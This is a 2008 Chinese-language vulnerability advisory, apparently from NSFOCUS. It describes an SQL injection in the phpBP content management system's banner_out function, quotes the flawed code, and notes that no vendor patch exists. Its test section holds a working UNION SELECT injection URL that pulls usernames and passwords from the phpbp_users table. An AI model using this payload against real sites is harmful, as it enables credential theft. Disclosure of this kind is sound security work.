首页 -> 安全研究

安全研究

安全漏洞
phpBP id参数远程SQL注入漏洞

发布日期:2008-03-17
更新日期:2008-03-18

受影响系统:
PHP BP Team phpBP
描述:
BUGTRAQ  ID: 28272

PHPBP是在波兰广泛使用的网站内容管理系统。

PHPBP的includes/functions/banners-external.php脚本文件中没有正确地验证对id参数的输入,允许远程攻击者通过提交特制的SQL查询请求执行SQL注入攻击。

以下是有漏洞的代码段:

...
3   function banner_out() //zlicza ilosc klikniec na banner
4   {
5    global $conf;
6
7    if($_GET['id'])
8    {
9     SQLvalidate($_POST['id']);
10
11    $db = new dbquery;
12    $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);
13
14    if($db->num_rows()==0)
15    {
16     redirect('index.php?module=error?error=banners_error2');
17     exit;
18    }
19
20    $d=$db->fetch_object();
21    $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);
22
23    redirect($d->url);
24   }
25
26   exit;
27  }
...

<*来源:irk4z (irk4z@yahoo.pl
  
  链接:http://secunia.com/advisories/29411/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

建议:
厂商补丁:

PHP BP Team
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpbp.com/index.php?module=download

浏览次数:4491
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障